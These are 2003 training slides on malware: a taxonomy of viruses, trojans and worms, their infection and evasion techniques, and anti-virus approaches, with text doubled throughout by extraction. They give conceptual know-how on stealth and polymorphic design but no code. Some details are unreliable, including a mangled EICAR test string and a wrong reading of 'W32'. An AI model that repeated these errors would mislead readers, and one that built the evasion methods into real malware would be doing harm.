software security malware: trojans, virii, and worms

Software SecuritySoftware Security

Malware: Malware: Trojans, Virii, Trojans, Virii, and Wormsand Worms

SECURITY INNOVATION ©2003

A Subject OverviewA Subject Overview

Viruses

Viruses WormsWorms Trojans

Trojans


TopicsTopics

• General DefinitionsGeneral Definitions– VirusesViruses– TrojansTrojans– WormsWorms

• In depth infoIn depth info– VirusesViruses– TrojansTrojans– WormsWorms

• Anti Virus TechnologiesAnti Virus Technologies


DefinitionsDefinitions

• VirusVirus - code that copies itself into other programs. - code that copies itself into other programs.• A “A “BacteriaBacteria” replicates until it fills all disk space, or CPU cycles.” replicates until it fills all disk space, or CPU cycles.• PayloadPayload - harmful things the malicious program does, after it - harmful things the malicious program does, after it

has had time to spread.has had time to spread.• WormWorm - a program that replicates itself across the network - a program that replicates itself across the network

(usually riding on email messages or attached documents (e.g., (usually riding on email messages or attached documents (e.g., macro viruses).macro viruses).

• Trojan HorseTrojan Horse - instructions in an otherwise good program that - instructions in an otherwise good program that cause bad things to happen (sending your data or password to cause bad things to happen (sending your data or password to an attacker over the net).an attacker over the net).

• Logic BombLogic Bomb - malicious code that activates on an event (e.g., - malicious code that activates on an event (e.g., date).date).

• Trap DoorTrap Door (or Back Door) - undocumented entry point written (or Back Door) - undocumented entry point written into code for debugging that can allow unwanted users.into code for debugging that can allow unwanted users.

• Easter EggEaster Egg - extraneous code that does something “cool.” A - extraneous code that does something “cool.” A way for programmers to show that they control the product.way for programmers to show that they control the product.


Computer VirusesComputer Viruses(and other “Malicious (and other “Malicious

ProgramsPrograms)• Computer “VirusesComputer “Viruses” and related programs have ” and related programs have

the ability to replicate themselves on an ever the ability to replicate themselves on an ever increasing number of computers. They increasing number of computers. They originally spread by people sharing floppy originally spread by people sharing floppy disks. Now they spread primarily over the disks. Now they spread primarily over the Internet (a “Worm”).Internet (a “Worm”).

• Other “Other “Malicious ProgramsMalicious Programs” may be installed ” may be installed by hand on a single machine. They may also by hand on a single machine. They may also be built into widely distributed commercial be built into widely distributed commercial software packages. These are very hard to software packages. These are very hard to detect before the payload activates (Trojan detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).Horses, Trap Doors, and Logic Bombs).

VirusesViruses


What exactly is a Virus?What exactly is a Virus?

• A term mistakenly applied to trojans and wormsA term mistakenly applied to trojans and worms• Small program that negatively alters the way a computer Small program that negatively alters the way a computer

worksworks• Self replicatingSelf replicating• Done without user knowledge or interventionDone without user knowledge or intervention

– still needs to be activated initially by the userstill needs to be activated initially by the user

• There are over 60,000 Viruses, Trojans, and Worms There are over 60,000 Viruses, Trojans, and Worms today!today!– Many are obsoleteMany are obsolete– New viruses are more and more lethalNew viruses are more and more lethal


What a Virus isn’t – Common What a Virus isn’t – Common AssumptionsAssumptions

• Equipment FailureEquipment Failure• Power surges/brownouts/spikesPower surges/brownouts/spikes• Magnets (that 8” subwoofer next to your case)Magnets (that 8” subwoofer next to your case)• Conflicting hardware driversConflicting hardware drivers• Settings or other changes made by someone else (i.e. clueless Settings or other changes made by someone else (i.e. clueless

techie) techie) • Something made by MicrosoftSomething made by Microsoft


Viruses - BeginningsViruses - Beginnings• First real virus called “Cloner” was written by 9First real virus called “Cloner” was written by 9thth grader Rich grader Rich

Skrenta in 1982 for the Apple II, Skrenta in 1982 for the Apple II,

It will get on all your disks It will get on all your disks It will stick to you like glue It will stick to you like glue It will infiltrate your chips It will infiltrate your chips It will modify ram too It will modify ram too

Yes it's Cloner! Yes it's Cloner! Send in the Cloner!Send in the Cloner!

• First major PC virus was called “Brain”First major PC virus was called “Brain”11 in 1986 in 1986 • Came from two brothers running a computer store in Lahore, Came from two brothers running a computer store in Lahore,

PakistanPakistan– Designed to prevent doctors from pirating their software by infecting Designed to prevent doctors from pirating their software by infecting

pirated copiespirated copies– ““Infecting” only put a copyright notice in the program’s directory of Infecting” only put a copyright notice in the program’s directory of

floppy disksfloppy disks

1 Although it was called 1 Although it was called The Brain virus The Brain virus it actually contained the authors phone it actually contained the authors phone numbers!numbers!


Viruses – Design Factors Viruses – Design Factors

• Ultimate goal is to spread as far as possible (both on Ultimate goal is to spread as far as possible (both on the box and globally) before being wiped outthe box and globally) before being wiped out

• Infection and Detection are mutually limiting factorsInfection and Detection are mutually limiting factors• The functional logic of an executable file virus is as The functional logic of an executable file virus is as

follows:follows:

• Search for a file to infectSearch for a file to infect– Open the file to see if it is infectedOpen the file to see if it is infected– If infected, search for another fileIf infected, search for another file– Else, infect the fileElse, infect the file– Return control to the host programReturn control to the host program


Viruses – Life CycleViruses – Life Cycle

• Before it takes any action it reproduces itselfBefore it takes any action it reproduces itself– Virus writers balance infection with detectionVirus writers balance infection with detection

• On a defined trigger, it it modifies your system in some wayOn a defined trigger, it it modifies your system in some way– Delete files, format drives,or shutdown programs Delete files, format drives,or shutdown programs – Eat up system resourcesEat up system resources– Alter dataAlter data


Viruses – What’s with the Viruses – What’s with the names?names?

• Names are determined by CARONames are determined by CARO• Each unique virus is given a family nameEach unique virus is given a family name

– Family names are derived from a quirk, the way it infects, or something Family names are derived from a quirk, the way it infects, or something else unique to the viruselse unique to the virus

• Each virus is further identified with prefixes and suffixesEach virus is further identified with prefixes and suffixes– Tells you what it does, how it infectsTells you what it does, how it infects

• Variants of a virus are given a suffix of .A to .ZZZVariants of a virus are given a suffix of .A to .ZZZ• The naming of a virus follows the format The naming of a virus follows the format

prefix “family name” suffix [suffix2, suffix3, …]prefix “family name” suffix [suffix2, suffix3, …]• Example: Example: W32.Bugbear@mm , one of the most lethal virus out there W32.Bugbear@mm , one of the most lethal virus out there

– W32 : File infector/boot sector virusW32 : File infector/boot sector virus– Bugbear : unique family nameBugbear : unique family name– @mm : Mass Mailing distribution – use standard techniques and email @mm : Mass Mailing distribution – use standard techniques and email

to distribute itselfto distribute itself• Every virus can be uniquely identified by its signature as wellEvery virus can be uniquely identified by its signature as well

– binary representation of its machine codebinary representation of its machine code


Taxonomy of Malicious Taxonomy of Malicious ProgramsPrograms

IndependenIndependentt

TrapdoorTrapdoor

ss

VirusesVirusesTrojan Trojan HorsesHorses

Logic Logic BombsBombs WormsWormsBacteriaBacteria

Host Host ProgramProgram


Virus PhasesVirus Phases• Dormant - waits for a trigger to start replicatingDormant - waits for a trigger to start replicating• Propagation - copies itself into other programs of the Propagation - copies itself into other programs of the

same type on a computer. Spreads when the user same type on a computer. Spreads when the user shares a file with another computer. Usually searches a shares a file with another computer. Usually searches a file for it’s own signature before infecting.file for it’s own signature before infecting.– Worms (like Melissa) spread over a network Worms (like Melissa) spread over a network

connection as executable attachments to email.connection as executable attachments to email.• Triggering - starts delivering payload. Sometimes Triggering - starts delivering payload. Sometimes

triggered on a certain date, or after a certain time after triggered on a certain date, or after a certain time after infection.infection.

• Execution - payload function is done. Perhaps it put a Execution - payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk funny message on the screen, or wiped the hard disk clean. It may become start the first phase over againclean. It may become start the first phase over again..


Types of VirusesTypes of Viruses• Parasitic Virus - attaches itself to executable files as part Parasitic Virus - attaches itself to executable files as part

of their code. Runs whenever the host program runs.of their code. Runs whenever the host program runs.• Memory-resident Virus - Lodges in main memory as part Memory-resident Virus - Lodges in main memory as part

of the residual operating system.of the residual operating system.• Boot Sector Virus - infects the boot sector of a disk, and Boot Sector Virus - infects the boot sector of a disk, and

spreads when the operating system boots up (original spreads when the operating system boots up (original DOS viruses).DOS viruses).

• Stealth Virus - explicitly designed to hide from Virus Stealth Virus - explicitly designed to hide from Virus Scanning programs.Scanning programs.

• Polymorphic - Virus - mutates with every new host to Polymorphic - Virus - mutates with every new host to prevent signature detection.prevent signature detection.


Viruses – are there “Good” Viruses – are there “Good” ones?ones?

Possible ideas for a “good” virus are:Possible ideas for a “good” virus are:• An Anti-Virus VirusAn Anti-Virus Virus

– Find other viruses and kill themFind other viruses and kill them• File Compressor VirusFile Compressor Virus

– Compresses the file it infectsCompresses the file it infects• Encryption VirusEncryption Virus

– Infects boot sector and encrypts the disk with a user Infects boot sector and encrypts the disk with a user supplied passwordsupplied password

• Maintenance VirusMaintenance Virus– Traverse a network and perform maintenance functions on Traverse a network and perform maintenance functions on

individual machinesindividual machines



““Good” viruses won’t succeed for many reasonsGood” viruses won’t succeed for many reasons• TechnicalTechnical

– Lack of controlLack of control– Recognition difficulty (a virus is still a virus)Recognition difficulty (a virus is still a virus)– Wasting resourcesWasting resources– ContainmentContainment– Compatibility problemsCompatibility problems

• Legal and EthicalLegal and Ethical– Unauthorized data modificationUnauthorized data modification– Copyright and ownership problemsCopyright and ownership problems– MisuseMisuse– Responsibility – “It was just research”, “You were sharing Responsibility – “It was just research”, “You were sharing

copyrighted files anyways”copyrighted files anyways”



• PsychologicalPsychological– Trust ProblemsTrust Problems

• People like having total control of their systemPeople like having total control of their system– Negative common meaningNegative common meaning

• Its still a virusIts still a virus• Would you buy a car that was called “Doesn’t Move”?Would you buy a car that was called “Doesn’t Move”?

– (ex. Chevy Nova)(ex. Chevy Nova)


Virus CharacteristicsVirus Characteristics• Boot sectorBoot sector

– Can’t infect across networks due to protocol Can’t infect across networks due to protocol restrictionsrestrictions

• MultipartiteMultipartite– Combination of Boot Sector and File Combination of Boot Sector and File

Infector…therefore, this type can Infector…therefore, this type can spread over networks. Very nasty.spread over networks. Very nasty.

• StealthStealth– Hides its signature through various means, Hides its signature through various means,

such as encryption. Also, by “Polymorphic” such as encryption. Also, by “Polymorphic” means.means.


Viruses – Classification Viruses – Classification by Infection Targetsby Infection Targets

• System sector/Boot virusesSystem sector/Boot viruses– Infect the system sectors of disks & hard drivesInfect the system sectors of disks & hard drives

• File/Parasitic virusesFile/Parasitic viruses– .COM and .EXE files, most typical.COM and .EXE files, most typical

• Batch file & Macro virusesBatch file & Macro viruses– Use text batch files or Word/Excel macrosUse text batch files or Word/Excel macros

• Cluster virusesCluster viruses– Infect the directory structuresInfect the directory structures

• Companion/Spawn virusesCompanion/Spawn viruses– Adds infected file to system startupAdds infected file to system startup

• Source code virusesSource code viruses– Add additional code to program source codeAdd additional code to program source code

• VB Script virusesVB Script viruses– Use Windows Scripting Host to control the machineUse Windows Scripting Host to control the machine


Viruses – System Viruses – System Sector/Boot VirusesSector/Boot Viruses

• Share infecting the most machines with Macro virusesShare infecting the most machines with Macro viruses• Infect the master boot record (MBR) or boot sector of disksInfect the master boot record (MBR) or boot sector of disks• Useful to virus writers because this area of the disk is invisible Useful to virus writers because this area of the disk is invisible

to the userto the user• Area of disk is small (512 bytes), so viruses store the actual Area of disk is small (512 bytes), so viruses store the actual

virus somewhere else on the disk and mark it as bad in the virus somewhere else on the disk and mark it as bad in the MBRMBR– Do this to avoid being detected by system scansDo this to avoid being detected by system scans

• Some Mac viruses infect upon the disk being insertedSome Mac viruses infect upon the disk being inserted


Viruses – System Viruses – System Sector/Boot VirusesSector/Boot Viruses

• System Sector VirusesSystem Sector Viruses– Stealth ComponentStealth Component

• Memory resident viruses of this type can foil sector Memory resident viruses of this type can foil sector editing programs by reporting back a saved copy of the editing programs by reporting back a saved copy of the original overwritten blocksoriginal overwritten blocks

– Multiple PartMultiple Part• Infect both system sectors and filesInfect both system sectors and files

– Infected files drop the virus on infected Infected files drop the virus on infected systemssystems


Viruses – Batch File Viruses – Batch File VirusesViruses

• Are .BAT script files that contain assembly code within themAre .BAT script files that contain assembly code within them• Utilizes a special handle in batch scripting that tells it to Utilizes a special handle in batch scripting that tells it to

interpret the commands after it as assemblyinterpret the commands after it as assembly• Can run payload themselves, or can create a separate file and Can run payload themselves, or can create a separate file and

run itrun it


Macro VirusesMacro Viruses

• Microsoft Office applications allow Microsoft Office applications allow “macros” to be part of the document. “macros” to be part of the document. The macro could run whenever the The macro could run whenever the document is opened, or when a certain document is opened, or when a certain command is selected (Save File). command is selected (Save File). – Targets particular data filesTargets particular data files– Uses application’s macro interpreterUses application’s macro interpreter

• A macro virus can delete files, generate A macro virus can delete files, generate email, edit letters, or mail itself to email, edit letters, or mail itself to everyone on internal mail-address lists.everyone on internal mail-address lists.


Viruses – Macro VirusesViruses – Macro Viruses• Regular data files did not propagate virusesRegular data files did not propagate viruses

– Viruses had to be executed manually and loaded into Viruses had to be executed manually and loaded into memorymemory

• Programs such as the Microsoft Office Suite incorporated Programs such as the Microsoft Office Suite incorporated macros with regular data filesmacros with regular data files– Macros are run upon loading the file and infect the Macros are run upon loading the file and infect the

systemsystem• Plain-text email with macro attachments can be Plain-text email with macro attachments can be

automatically run upon opening or previewing the automatically run upon opening or previewing the messagemessage– Bubbleboy (actually a worm) did thisBubbleboy (actually a worm) did this

• Melissa - the first virus to be both a Word macro virus Melissa - the first virus to be both a Word macro virus and to use the Outlook express address bookand to use the Outlook express address book

• Tristate – macro virus that infected Word, Excel, and Tristate – macro virus that infected Word, Excel, and PowerPointPowerPoint


Viruses – File (Parasitic) Viruses – File (Parasitic) VirusesViruses

• Locate and infect .EXE .COM .OVL .DLL filesLocate and infect .EXE .COM .OVL .DLL files• Overwrite part of the program’s code with a copy of itselfOverwrite part of the program’s code with a copy of itself• Are not as widespread as system sector and macro virusesAre not as widespread as system sector and macro viruses


Viruses – File (Parasitic) Viruses – File (Parasitic) VirusesViruses

• Simple File VirusesSimple File Viruses– After transplanting After transplanting

itself in the itself in the executable, the executable, the executable often executable often doesn’t workdoesn’t work

• Stealth ComponentStealth Component– Work very similar Work very similar

to stealth system to stealth system sector virusessector viruses

• Mask the file size of Mask the file size of infected files when infected files when a directory listing is a directory listing is done on themdone on them


File InfectorsFile Infectors

• Must be executed to spread or deliver Must be executed to spread or deliver payload.payload.

• Payloads may be event-driven Payloads may be event-driven (Logic/Time Bomb).(Logic/Time Bomb).

• Resident viruses remain in memory to Resident viruses remain in memory to infect programs as they are run. infect programs as they are run.

• May spread my many means: May spread my many means: – over networks, over networks, – from diskettes (sneaker-net), from diskettes (sneaker-net), – from downloads.from downloads.


.COM.COM

Start End

Prepended virusPrepended virus(.COM)(.COM)

Start End

Appended virusAppended virus(.COM & .EXE)(.COM & .EXE)

Jump End

= virus code

= program flow

‚

ƒ „…

File InfectorsFile Infectors


Viruses – Cluster VirusesViruses – Cluster Viruses

• Infect directory information in the file Infect directory information in the file system rather than the filesystem rather than the file– When user tries to run the program, the When user tries to run the program, the

virus is ran insteadvirus is ran instead– To remain stealth, the virus then locates the To remain stealth, the virus then locates the

file and runs itfile and runs it

• If you boot without the virus in memory If you boot without the virus in memory utilities will report serious problems with utilities will report serious problems with the file systemthe file system– allowing the utility to fix them will it will allowing the utility to fix them will it will

erase programs in the infected directorieserase programs in the infected directories


Viruses – Viruses – Companion/Spawn Companion/Spawn

VirusesViruses• Legacy virus – take advantage of the way DOS Legacy virus – take advantage of the way DOS

executes .COM files before .EXE filesexecutes .COM files before .EXE files– Infects by making a .COM file with the same name as Infects by making a .COM file with the same name as

a .EXEa .EXE– Relies on most users omitting prog.exe when typing a Relies on most users omitting prog.exe when typing a

commandcommand

• This method and the cluster method are the This method and the cluster method are the only ways viruses can infect files without only ways viruses can infect files without modifying themmodifying them


Viruses – Source Code Viruses – Source Code and VB Script Virusesand VB Script Viruses

• Source code viruses seek out source code on an infected Source code viruses seek out source code on an infected computer and add additional malicious code to itcomputer and add additional malicious code to it– Not very popularNot very popular

• Not many people program/compile code on their Not many people program/compile code on their computercomputer

• VB Script viruses are extremely popular because VB Script viruses are extremely popular because everyone running IE5 or higher can become infectedeveryone running IE5 or higher can become infected– Allows rogue code to execute arbitrary commands on Allows rogue code to execute arbitrary commands on

your systemyour system– Ex: Many VB script viruses email themselves in Ex: Many VB script viruses email themselves in

outlook & outlook express just like worms dooutlook & outlook express just like worms do


VBS VirusesVBS Viruses

• ILoveYou Virus ILoveYou Virus – E-mail attachment in “VBS”.E-mail attachment in “VBS”.– Attempts to spread to default Outlook Attempts to spread to default Outlook

address book contactsaddress book contacts– Installs a password-grabbing program, Installs a password-grabbing program,

forwarding to an Online Chat Roomforwarding to an Online Chat Room– Overwrites some filesOverwrites some files


Viruses – by Infection Viruses – by Infection MethodsMethods

• Polymorphic VirusesPolymorphic Viruses• Metamorphic Metamorphic • Stealth VirusesStealth Viruses• Fast and Slow infectionsFast and Slow infections• Sparse InfectorsSparse Infectors• Armored VirusesArmored Viruses• Multipartite VirusesMultipartite Viruses• Cavity VirusesCavity Viruses• Tunneling VirusesTunneling Viruses• NTFS Stream VirusesNTFS Stream Viruses


Viruses - PolymorphicViruses - Polymorphic• Polymorphic viruses change with each infectionPolymorphic viruses change with each infection• Polymorph/Mutation engines allow virus authors to make their virus polymorphic automatically Polymorph/Mutation engines allow virus authors to make their virus polymorphic automatically • Simple polymorph engines insert “NOPS” into the assembly code of a virusSimple polymorph engines insert “NOPS” into the assembly code of a virus

– Very easy to detectVery easy to detect• Other simple polymorphic viruses can encrypt themselves with random keysOther simple polymorphic viruses can encrypt themselves with random keys• More complex mutation engines insert junk code into the virusMore complex mutation engines insert junk code into the virus

– Junk code must not interfere with the real executing code!Junk code must not interfere with the real executing code!• Ideal polymorph engines for authors would create a truly unique virus every timeIdeal polymorph engines for authors would create a truly unique virus every time


Viruses – MetamorphicViruses – Metamorphic

• Change virus structure and decryption engine Change virus structure and decryption engine to evade signature matchingto evade signature matching– Example – W32,Simili virusExample – W32,Simili virus

• Creates a copy from the decrypted virusCreates a copy from the decrypted virus• Takes out unused and extraneous code to get a “Core Takes out unused and extraneous code to get a “Core

Virus”Virus”• Re-mutates the virus by moving and splitting functionsRe-mutates the virus by moving and splitting functions• Adds extra unused/redundant code and modified Adds extra unused/redundant code and modified

decryption enginedecryption engine


Viruses – StealthViruses – Stealth• In order to infect a system the virus must make some In order to infect a system the virus must make some

changes to the systemchanges to the system• Stealth viruses are memory resident viruses that act as Stealth viruses are memory resident viruses that act as

a blindfold to system processesa blindfold to system processes• Used to avoid detection and examination by the systemUsed to avoid detection and examination by the system• Utilized by many viruses:Utilized by many viruses:

– File – return the original size of infected file when File – return the original size of infected file when queriedqueried

– Cluster – run the virus first, then run the user’s Cluster – run the virus first, then run the user’s intended program intended program

– System Sector/Boot – report bad blocks on disk where System Sector/Boot – report bad blocks on disk where virus is locatedvirus is located


Viruses – Fast/Slow Viruses – Fast/Slow InfectorsInfectors

• Come from different methods of infectionCome from different methods of infection– Fast infector – spreads fast, doesn’t care about Fast infector – spreads fast, doesn’t care about

detectiondetection– Slow infector – spread randomly, avoids detectionSlow infector – spread randomly, avoids detection

• Fast infector – infect when a file is accessed/runFast infector – infect when a file is accessed/run– Takes advantage of anti-virus scansTakes advantage of anti-virus scans

• Scanner opens up every fileScanner opens up every file• Fast infector infects the recently opened fileFast infector infects the recently opened file

• Slow infector – infect when a file is created/modifiedSlow infector – infect when a file is created/modified– Try to “defeat integrity checking software by Try to “defeat integrity checking software by

piggybacking on top of the process which legitimately piggybacking on top of the process which legitimately changes a file”changes a file”


Viruses – Sparse, Viruses – Sparse, Armored, and Multi Part Armored, and Multi Part

VirusesViruses• Sparse infectors aim to be widespread and undetectedSparse infectors aim to be widespread and undetected

– Use a variety of techniques to infect & remain Use a variety of techniques to infect & remain undetected such as:undetected such as:• Infect every Nth time a file is accessedInfect every Nth time a file is accessed• Every file with a specific stringEvery file with a specific string• Every time a specific keystroke occursEvery time a specific keystroke occurs

• Armored viruses use special tricks to make the tracing, Armored viruses use special tricks to make the tracing, disassembling, and understanding of their code more disassembling, and understanding of their code more difficult. difficult. 11

– Do this by attempting to confuse the virus scanner Do this by attempting to confuse the virus scanner trying to find its exact location among other trickstrying to find its exact location among other tricks

• Multi Part viruses are a combination of system sector Multi Part viruses are a combination of system sector and file infector virusesand file infector viruses

1http://kb.indiana.edu/data/aehs.html


Viruses – Cavity VirusesViruses – Cavity Viruses

• Cavity viruses exploit gaps in program Cavity viruses exploit gaps in program files and insert themselves inside, similar files and insert themselves inside, similar to a typical file virusto a typical file virus– A new windows file format called the “Portable A new windows file format called the “Portable

Executable” designed to decrease load times, Executable” designed to decrease load times, has many blank gaps inside the filehas many blank gaps inside the file

• File/Parasitic Viruses are similar to cavity File/Parasitic Viruses are similar to cavity viruses but are not as craftyviruses but are not as crafty

• Both types of viruses use some kind of Both types of viruses use some kind of stealth protection as wellstealth protection as well


Viruses – Tunneling Viruses – Tunneling VirusesViruses

• Tunneling viruses strip hardware interrupts of Tunneling viruses strip hardware interrupts of any programs monitoring redirection any programs monitoring redirection – Enables viruses to go undetected and infect other Enables viruses to go undetected and infect other

programsprograms

• This same method is used by anti-virus This same method is used by anti-virus programs as well to prevent being detected by programs as well to prevent being detected by viruses upon loadviruses upon load

• Tunneling viruses can get into a “war” with the Tunneling viruses can get into a “war” with the anti-virus program over who will be in control anti-virus program over who will be in control of interruptsof interrupts


Viruses – NTFS Alternate Viruses – NTFS Alternate Data StreamsData Streams

• NTFS partitions can store data in a file and not NTFS partitions can store data in a file and not increase the size whatsoeverincrease the size whatsoever

• Data is invisible to normal system tools and Data is invisible to normal system tools and programsprograms

• You can clean a file manually by copying it to You can clean a file manually by copying it to another file system (one that is not formatted another file system (one that is not formatted NTFS) and back againNTFS) and back again


Virus DetectionVirus Detection

• 1st Generation, 1st Generation, ScannersScanners: searched files for any of a : searched files for any of a library of known virus “signatures.” Checked executable library of known virus “signatures.” Checked executable files for length changes.files for length changes.

• 2nd Generation, 2nd Generation, Heuristic ScannersHeuristic Scanners: looks for more : looks for more general signs than specific signatures (code segments general signs than specific signatures (code segments common to many viruses). Checked files for checksum common to many viruses). Checked files for checksum or hash changes.or hash changes.

• 3rd Generation, 3rd Generation, Activity TrapsActivity Traps: stay resident in memory : stay resident in memory and look for certain patterns of software behavior (e.g., and look for certain patterns of software behavior (e.g., scanning files).scanning files).

• 4th Generation, 4th Generation, Full FeaturedFull Featured: combine the best of the : combine the best of the techniques above.techniques above.


Anti-Virus TechnologiesAnti-Virus Technologies

• ScannersScanners– InterceptorsInterceptors– DisinfectorsDisinfectors– HeuristicsHeuristics

• InoculatorsInoculators• Integrity CheckersIntegrity Checkers• Safe Computing (aka Common Sense)Safe Computing (aka Common Sense)• NBAR/QoSNBAR/QoS• Eicar test stringEicar test string• Anti-Virus PackagesAnti-Virus Packages


Anti-Virus Anti-Virus Technologies Technologies

ScannersScanners• Scanners consist of a twofold method of protectionScanners consist of a twofold method of protection

– File scanningFile scanning– Background Checking (interceptors)Background Checking (interceptors)

• Check for viruses by analyzing for virus signaturesCheck for viruses by analyzing for virus signatures– Works on known viruses that are unencryptedWorks on known viruses that are unencrypted– Unknown viruses can be detected by monitoring activityUnknown viruses can be detected by monitoring activity

• False alarms issuedFalse alarms issued• New technologies are improving thisNew technologies are improving this

– Only as good as the last updateOnly as good as the last update• Speed up scanning in various ways (part of heuristics)Speed up scanning in various ways (part of heuristics)

– by only scanning .EXEs for file viruses, boot sectors for boot viruses, etcby only scanning .EXEs for file viruses, boot sectors for boot viruses, etc– algorithms to scan only sections of the file rather than the wholealgorithms to scan only sections of the file rather than the whole

• Disinfectors are also built into any reputable scannerDisinfectors are also built into any reputable scanner– Can remove a virus from a file, but often cannot do so without damaging the fileCan remove a virus from a file, but often cannot do so without damaging the file– If files cannot be disinfected safely, they can be quarantinedIf files cannot be disinfected safely, they can be quarantined– Still does not mean your system is safeStill does not mean your system is safe


Anti-Virus Anti-Virus Technologies Technologies

ScannersScanners• Check for viruses by using HeuristicsCheck for viruses by using Heuristics

– 70-80% Success rate70-80% Success rate– Unknown viruses can be detectedUnknown viruses can be detected

• Look at characteristics of a file – determine probability of Look at characteristics of a file – determine probability of being infectedbeing infected

• Can find and stop some new viruses from executingCan find and stop some new viruses from executing– Used to find viruses without signatures (Metamorphic Viruses)Used to find viruses without signatures (Metamorphic Viruses)

• These viruses expand/contract in sizeThese viruses expand/contract in size• Use encryption as wellUse encryption as well

– Use a point system to detectUse a point system to detect• Certain actions get a certain amount of pointsCertain actions get a certain amount of points• If enough points accumulated, then scanner is set offIf enough points accumulated, then scanner is set off

– Can be applied for what viruses not to scanCan be applied for what viruses not to scan


Anti-Virus Technologies Anti-Virus Technologies InoculatorsInoculators

• Mark sectors and files as infected in the usual spot where Mark sectors and files as infected in the usual spot where viruses lookviruses look– Doesn’t anymore work todayDoesn’t anymore work today

• Make programs self-checkingMake programs self-checking– Insert code at beginning of program to compare generated Insert code at beginning of program to compare generated

data (by the code) to stored datadata (by the code) to stored data• Can be circumvented by stealth virusesCan be circumvented by stealth viruses• Check Code/Stored Code can be modifiedCheck Code/Stored Code can be modified• Sets off alarms for interceptorsSets off alarms for interceptors• Prevents some programs from workingPrevents some programs from working


Anti-Virus Anti-Virus Technologies Technologies Integrity Integrity

CheckersCheckers• Viruses infect/attack by making changes to the systemViruses infect/attack by making changes to the system• Integrity checkers monitor system changesIntegrity checkers monitor system changes

– Initially scans disk and records a unique “signature” for all Initially scans disk and records a unique “signature” for all files and partitionsfiles and partitions

– Can alert the user of a virus when certain changes are Can alert the user of a virus when certain changes are mademade

– Allow you to see what damage has been done by a virusAllow you to see what damage has been done by a virus– Ideally can be used to detect unknown virusesIdeally can be used to detect unknown viruses

• Things holding integrity checkers backThings holding integrity checkers back– Must be combined with a good scanner – Stand alones don’t Must be combined with a good scanner – Stand alones don’t

workwork– Scanners that incorporate these checkers don’t incorporate Scanners that incorporate these checkers don’t incorporate

them effectivelythem effectively• Not checking enough changesNot checking enough changes

– Some checkers are slow and unwieldySome checkers are slow and unwieldy• Can also be implemented in detecting system break insCan also be implemented in detecting system break ins


Anti-Virus Anti-Virus TechnologiesTechnologies Common SenseCommon Sense!!

• Do not leave a floppy disk in the floppy disk drive when you shut Do not leave a floppy disk in the floppy disk drive when you shut down or restart the computerdown or restart the computer

• Write-protect your floppy disks after you have finished writing to Write-protect your floppy disks after you have finished writing to themthem

• Be suspicious of email attachments from unknown sourcesBe suspicious of email attachments from unknown sources• Verify that attachments have been sent by the author of the Verify that attachments have been sent by the author of the

email. Newer viruses can send email messages that appear to be email. Newer viruses can send email messages that appear to be from people you knowfrom people you know

• Do not set your email program to "auto-run" attachments or auto Do not set your email program to "auto-run" attachments or auto previewpreview

• Obtain all Microsoft security updatesObtain all Microsoft security updates• Back up your data frequently. Keep the (write protected) media Back up your data frequently. Keep the (write protected) media

in a safe place--preferably in a different location than your in a safe place--preferably in a different location than your computercomputer

• Disable windows scripting hostDisable windows scripting host• Look at extensions – megadeth_song.exe, familyvacation.comLook at extensions – megadeth_song.exe, familyvacation.com• Watch out for double extensions – corvette.jpg.exeWatch out for double extensions – corvette.jpg.exe


Anti-Virus TechnologiesAnti-Virus Technologies NBAR/QoSNBAR/QoS

• You can use Cisco’s Network Based Application Recognition (a You can use Cisco’s Network Based Application Recognition (a QoS feature included in their latest routers) to get rid of code QoS feature included in their latest routers) to get rid of code redred

• Setup HTTP filter by URL with text string unique to virusSetup HTTP filter by URL with text string unique to virus• Attach it to its own class mapAttach it to its own class map• Attach class map with policy mapAttach class map with policy map• Set DSCP to 1 (usually not used in a configuration)Set DSCP to 1 (usually not used in a configuration)• Block Code red attempts with an ACLBlock Code red attempts with an ACL


Anti-Virus Anti-Virus TechnologiesTechnologies EICAR EICAR

GroupGroup• EICAR test string is not a real virusEICAR test string is not a real virus• Used in testing & development of anti-virus softwareUsed in testing & development of anti-virus software• Looks similar to the following:Looks similar to the following:

%^$#!FP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-%^$#!FP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*FILE!$H+H*

• EICAR’s Mission statement:EICAR’s Mission statement:

““EICAR combines universities, industry and media plus technical, EICAR combines universities, industry and media plus technical, security and legal experts from civil and military government security and legal experts from civil and military government and law enforcement as well as privacy protection organizations and law enforcement as well as privacy protection organizations whose objectives are to unite efforts against writing and whose objectives are to unite efforts against writing and proliferation of malicious code like computer viruses or Trojan proliferation of malicious code like computer viruses or Trojan Horses, and, against computer crime, fraud and the misuse of Horses, and, against computer crime, fraud and the misuse of computers or networks, inclusive malicious exploitation of computers or networks, inclusive malicious exploitation of personnel data, based on a personnel data, based on a code of conductcode of conduct. “. “

http://www.eicar.org/code_of_conduct.htm


Anti-Virus Anti-Virus TechnologiesTechnologies

PackagesPackages• Norton AntivirusNorton Antivirus

– Corporate edition includes many remote administration featuresCorporate edition includes many remote administration features

• Dr. Solomon’sDr. Solomon’s• McAfeeMcAfee• SophosSophos• Many, many othersMany, many others

WormsWorms


• Similar to a virus, but propagates itself through the Internet by Similar to a virus, but propagates itself through the Internet by breaking into machinesbreaking into machines

• Main goal is to bring down and deny access to networks and Main goal is to bring down and deny access to networks and servicesservices

• Does not rely on user interventionDoes not rely on user intervention• Does not rely on being transmitted physically (i.e. by disk)Does not rely on being transmitted physically (i.e. by disk)• Does not rely on being emailed or transferred by the Does not rely on being emailed or transferred by the useruser – does – does

it by itselfit by itself

Okay, So Then What’s a Okay, So Then What’s a Worm?Worm?


Why Worms?Why Worms?

• EaseEase– write and launch oncewrite and launch once– many acquisitionsmany acquisitions– continually workingcontinually working

• PervasivenessPervasiveness– weeds out weakest targetsweeds out weakest targets– penetrates difficult networkspenetrates difficult networks


WormsWorms• A worm is a self propagating piece of malicious A worm is a self propagating piece of malicious

software. It attacks vulnerable hosts, infects software. It attacks vulnerable hosts, infects them, then uses them to attack other vulnerable them, then uses them to attack other vulnerable hostshosts

• ““Famous” WormsFamous” Worms– Morris Internet worm (1988)Morris Internet worm (1988)– Currently:Currently:

• Ramen WormRamen Worm• Lion wormLion worm• Adore WormAdore Worm• Code Red Code Red • NimdaNimda


WormsWorms

• Who Writes ThemWho Writes Them– Hacker/CrackersHacker/Crackers– ResearchersResearchers– Virus WritersVirus Writers


WormsWorms

